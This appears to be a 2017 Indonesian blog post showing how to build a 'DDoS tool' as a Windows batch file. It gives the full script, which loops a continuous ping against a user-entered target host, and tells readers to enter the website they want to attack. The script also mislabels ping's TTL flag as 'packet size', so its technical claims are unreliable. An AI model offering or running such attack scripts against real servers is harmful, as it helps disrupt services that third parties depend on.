membuat Tools DDoS sendiri dengan Notepad - Network
News Update
Loading...

Thursday, May 18, 2017

membuat Tools DDoS sendiri dengan Notepad

malam! 
pada tau DDoS kan? tau lah! nah,disini saya akan memberikan ilmu/tutorial cara membuat tools DDoS sendiri :D


ini tools yang dibutuhkan  :

1. Notepad .
2. Script DDos .


langkah langkah nya gan :

  1. Buka Notepad.
  2. Copy & Paste Kan Script Di Bawah Ini :


@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo =          Hacking Tools         =
echo ==================================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server    +
echo + Author : Luqmanul Hakim              +
echo + Visite : LuqmanSeo.blogspot.com +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / Host Target    *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

     3.   Simpan Dengan Type "All Files" Dan Beri Nama Sesuka Anda Dengan Format .bat ( Contoh : Ddos.bat )

Cara Pakai :

Pada menu Server-Target -> *    Masukan IP / Host Target    *
masukan alamat web yang ingin di DDOS.

okk! sekian dan terima kasih! :D 

Source : LuqmanSeo
Comments


EmoticonEmoticon

Notification
This is just an example, you can fill it later with your own note.
Done